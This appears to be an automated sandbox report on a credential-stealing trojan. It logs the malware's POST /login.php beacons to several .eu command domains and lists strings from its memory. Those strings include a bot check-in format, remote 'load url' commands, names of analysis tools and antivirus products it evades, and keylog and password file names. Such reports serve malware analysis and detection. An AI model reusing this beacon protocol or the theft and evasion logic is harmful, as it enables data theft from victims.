<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)|!(IE)]><!--><html lang="de"> <!--<![endif]-->..<head>. <title>. Seite nicht gefunden | VOCER </title>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <meta name="google-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-PoEGAg" />. <meta http-equiv="expires" content="0">. <link rel="alternate" type="application/rss xml" title="Vocer RSS Feed" href="hXXp://VVV.vocer.org/feed/" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />.. .<!-- Favions and Touch icons -->. <link rel="shortcut icon" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/favicon.ico" />. <!-- iPad, Retina, iOS ... 7: -->. <link rel="apple-touch-icon-precomposed" sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-152x152-precomposed.png">. <!-- iPad, Retina, iOS ... 6: -->. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-144x144-precomposed.png">. <!-- iPhon

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volez.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.16 (Debian)

Vary: Accept-Encoding

Content-Length: 281

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lymos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganiq.eu

Content-Length: 9

Pragma: no-cache

Cookie: qtrans_cookie_test=qTranslate Cookie Test; PHPSESSID=skch52vu4qkpopsecb93cpfmh2

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:00:10 GMT

Server: Apache/2

X-Powered-By: PHP/5.3.23

Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

X-Pingback: hXXp://ganiq.com/xmlrpc.php

X-UA-Compatible: IE=edge,chrome=1

Vary: Accept-Encoding,User-Agent

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/ns#" class=" html_stretched responsive av-default-lightbox html_header_top html_logo_left html_menu_right html_slim html_header_sticky html_header_shrinking html_mobile_menu_phone html_content_align_center ">.<head>.<meta charset="UTF-8" />..<!-- page title, displayed in your browser bar -->.<title>Page Not Found - ganiQ</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mobile setting -->.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_head hook -->..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->.<meta property="og:locale" content="nl_NL" />.<meta property="og:type" content="object" />.<meta property="og:title" content="Page Not Found - ganiQ" />.<meta property="og:site_name" content="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<link rel="alternate" type="application/rss xml" title="ganiQ » Feed" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="application/rss xml" title="ganiQ » reacties feed" href="hXXp://ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_gallery_related_images-css' href='hXXp://ganiq.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyken.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Mon, 10 Nov 2014 20:01:31 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.4.30

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="hXXp://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" />..<title>Parkerad hos Loopia</title>. . <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-57.png" />. <link rel="apple-touch-icon" media="screen and (resolution: 132dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-72.png" />. <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="hXXps://static.loopia.se/responsive/images/iOS-114.png" />. <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" />.. <link rel="stylesheet" type="text/css" href="hXXps://static.loopia.se/responsive/styles/reset.css" /> . <link rel="stylesheet" type="text/css" href="hXXps://static.loopia.se/responsive/styles/extra-pages.css" />...<script src="hXXps://static.loopia.se/responsive/js/respond-js/respond.src.js"></script> <!-- Script that makes older browsers IE8, FF2 compatible with max- and min-width in MediaQueries --> . .</head>.<body>...<div class="content">...<div class="center"><img src="https://static.loopia.se/responsive/images/extra_pages/parking-skylt.pn

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:28 GMT

Server: Apache / DataZone

Content-Length: 276

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache / DataZone Server at qexer.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyran.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=iso-8859-1

Content-Length: 207

Accept-Ranges: bytes

Date: Mon, 10 Nov 2014 20:01:35 GMT

X-Varnish: 1001493341

Age: 0

Via: 1.1 varnish

Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volar.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:42 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>volar.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">volar.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://volar.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://volar.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://volar.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganiq.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:00:08 GMT

Server: Apache/2

X-Powered-By: PHP/5.3.23

Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu

Set-Cookie: PHPSESSID=skch52vu4qkpopsecb93cpfmh2; path=/

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

X-Pingback: hXXp://ganiq.com/xmlrpc.php

X-UA-Compatible: IE=edge,chrome=1

Vary: Accept-Encoding,User-Agent

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/ns#" class=" html_stretched responsive av-default-lightbox html_header_top html_logo_left html_menu_right html_slim html_header_sticky html_header_shrinking html_mobile_menu_phone html_content_align_center ">.<head>.<meta charset="UTF-8" />..<!-- page title, displayed in your browser bar -->.<title>Page Not Found - ganiQ</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mobile setting -->.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_head hook -->..<!-- This site is optimized with the Yoast WordPress SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->.<meta property="og:locale" content="nl_NL" />.<meta property="og:type" content="object" />.<meta property="og:title" content="Page Not Found - ganiQ" />.<meta property="og:site_name" content="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<link rel="alternate" type="application/rss xml" title="ganiQ » Feed" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="application/rss xml" title="ganiQ » reacties feed" href="hXXp://ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_gallery_related_images-css' href='hXXp://ganiq.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadoc.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.vocer.org

Pragma: no-cache

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

X-Powered-By: PHP/5.4.34-nmm1

X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Vary: Accept-Encoding

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)|!(IE)]><!--><html lang="de"> <!--<![endif]-->..<head>. <title>. Seite nicht gefunden | VOCER </title>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <meta name="google-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-PoEGAg" />. <meta http-equiv="expires" content="0">. <link rel="alternate" type="application/rss xml" title="Vocer RSS Feed" href="hXXp://VVV.vocer.org/feed/" />. <meta http-equiv="X-UA-Compatible" content="IE=edge" />.. .<!-- Favions and Touch icons -->. <link rel="shortcut icon" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/favicon.ico" />. <!-- iPad, Retina, iOS ... 7: -->. <link rel="apple-touch-icon-precomposed" sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-152x152-precomposed.png">. <!-- iPad, Retina, iOS ... 6: -->. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/images/apple-touch-icon-144x144-precomposed.png">. <!-- iPhon

<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.galin.eu

Pragma: no-cache

HTTP/1.0 200 OK

Date: Mon, 10 Nov 2014 20:01:00 GMT

Server: Apache

X-Powered-By: PHP/5.3.3-7 squeeze19

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Mon, 10 Nov 2014 20:01:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: tu=9e3d564785c4d8f1cca2f093ea1199ed; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=galin.eu; httponly

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDxeFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg==

Vary: User-Agent,Accept-Encoding

Content-Type: text/html; charset=UTF-8

X-Cache: MISS from 070837

Connection: close

.<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDxeFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg=="><head><meta charset="utf-8" /><style type="text/css">/*!normalize.css v1.1.2 | MIT License | git.io/normalize */ article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block;}audio,canvas,video{display:inline-block;*display:inline;*zoom:1;}audio:not([controls]){display:none;height:0;}[hidden]{display:none;}html{font-size:100%;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}html,button,input,select,textarea{font-family:sans-serif;}body{margin:0;}a:focus{outline:thin dotted;}a:active,a:hover{outline:0;}h1{font-size:2em;margin:0;}h2{font-size:1.33em;margin:0;}h3{font-size:1.1em;margin:0;}h4{font-size:1em;margin:0;}h5{font-size:.83em;margin:0;}h6{font-size:.67em;margin:0;}abbr[title]{border-bottom:1px dotted;}b,strong{font-weight:bold;}blockquote{margin:.11em 40px;}dfn{font-style:italic;}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0;}mark{background:#ff0;color:#000;}p,pre{margin:.11em 0;}code,kbd,pre,samp{font-family:monospace,serif;_font-family:'courier new',monospace;font-size:1em;}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word;}q{quotes:none;}q:before,q:after{content:'';content:none;}small{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:re

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volym.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 500 Internal Server Error

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:13 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: close

Content-Length: 640

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. drift@loopia.se and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<hr>.<address>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at volym.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purol.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 500 Internal Server Error

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 2072

Connection: close

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>.<head>..<title>Error 500 - Internal server error</title>.</head>..<body bgcolor="White" text="Black">...<table cellspacing="0" cellpadding="0" width="100%" height="100%" border="0">.<tr>..<td align="center" valign="middle">......<table border="0" cellspacing="0" cellpadding="0">...<tr>....<td rowspan="5" valign="top"><img src="/spicons/server.jpg" width=163 height=177 alt="" border="0"></td>....<td colspan="4"><img src="/spicons/mrblue.gif" width="500" height=2 alt="" border="0"></td>....<td><img src="/spicons/undercover.gif" width=1 height=2 alt="" border="0"></td>...</tr><tr>....<td rowspan="4" valign="bottom"><img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0"></td>......<td valign="middle" align="center" rowspan="2">.....<table cellspacing="1" cellpadding="0" width=470 border="0">.....<tr>......<td><font face="Verdana, Helvetica, sans-serif" size="5" color="Red"><b>Error 500 - Internal server error</b></font><br><img src="/spicons/undercover.gif" width=14 height=5 alt="" border="0"><br></td>.....</tr><tr>......<td><font face="Verdana, Helvetica, sans-serif" size="2" color="Black">The server encountered an unexpected condition which prevented it from fulfilling the request.&

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

winlogon.exe_716_rwx_01A80000_000BF000:

.text

.text

`.data

`.data

.reloc

.reloc

`.rdata

`.rdata

@.data

@.data

@.reloc

@.reloc

http

http

SSSh

SSSh

PASSu:8V

PASSu:8V

PASSu-8V

PASSu-8V

PSSSSSSSh

PSSSSSSSh

t%F;5

t%F;5

12345678

12345678

password1

password1

monkey

monkey

monkey1

monkey1

password

password

Pname.key

Pname.key

\secrets.key

\secrets.key

kernel32.dll

kernel32.dll

\explorer.exe

\explorer.exe

user32.dll

user32.dll

multi_pot.exe

multi_pot.exe

HookExplorer.exe

HookExplorer.exe

proc_analyzer.exe

proc_analyzer.exe

sckTool.exe

sckTool.exe

sniff_hit.exe

sniff_hit.exe

sysAnalyzer.exe

sysAnalyzer.exe

idag.exe

idag.exe

ollydbg.exe

ollydbg.exe

dumpcap.exe

dumpcap.exe

wireshark.exe

wireshark.exe

avp.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

%s!%s!X

sysinfo.log

sysinfo.log

scr.jpg

scr.jpg

minidump.bin

minidump.bin

%d.%d.%d.%d

%d.%d.%d.%d

Ý %dh %dm

Ý %dh %dm

%s:%d

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

Software\Microsoft\Internet Explorer\TypedURLs

url%i

url%i

4.5.11

4.5.11

%dx%d@%d

%dx%d@%d

%c%d:d

%c%d:d

{Windows directory:

{Windows directory:

links.log

links.log

\History.IE5\index.dat

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

\Opera\Opera\typed_history.xml

avast.com

avast.com

93.191.13.100

93.191.13.100

drweb

drweb

eset.com

eset.com

z-oleg.com

z-oleg.com

kltest.org.ru

kltest.org.ru

.comodo.com

.comodo.com

google.com

google.com

Dnsapi.dll

Dnsapi.dll

ws2_32.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

/search.php

Winmm.dll

Winmm.dll

Kernel32.dll

Kernel32.dll

Gdi32.dll

Gdi32.dll

ntdll.dll

ntdll.dll

hXXp://

hXXp://

hXXps://

hXXps://

HTTP/1.

HTTP/1.

nspr4.dll

nspr4.dll

PR_OpenTCPSocket

PR_OpenTCPSocket

[[[URL: %s

[[[URL: %s

Process: %s

Process: %s

User-agent: %s]]]

User-agent: %s]]]

{{{%s

{{{%s

Crypt32.dll

Crypt32.dll

CertVerifyCertificateChainPolicy

CertVerifyCertificateChainPolicy

Wininet.dll

Wininet.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestW

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

set_url

set_url

microsoft.public.win32.programmer.kernel

microsoft.public.win32.programmer.kernel

\iexplore.exe

\iexplore.exe

keygrab

keygrab

u.jpg

u.jpg

IprivLibEx.dll

IprivLibEx.dll

\\.\PhysicalDrive%u

\\.\PhysicalDrive%u

/topic.php

/topic.php

keylog.txt

keylog.txt

sniff.log

sniff.log

passwords.txt

passwords.txt

%s%u.zip

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.bing.com

VVV.microsoft.com

VVV.microsoft.com

frd.exe

frd.exe

command=config&update_url=

command=config&update_url=

&port=

&port=

command=load&url=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\chrome.exe

\svchost.exe

\svchost.exe

\opera.exe

\opera.exe

\cbmain.ex

\cbmain.ex

\iscc.exe

\iscc.exe

\clmain.exe

\clmain.exe

%s.dbf

%s.dbf

%s.DBF

%s.DBF

pop2://%s:%s@%s:%i

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

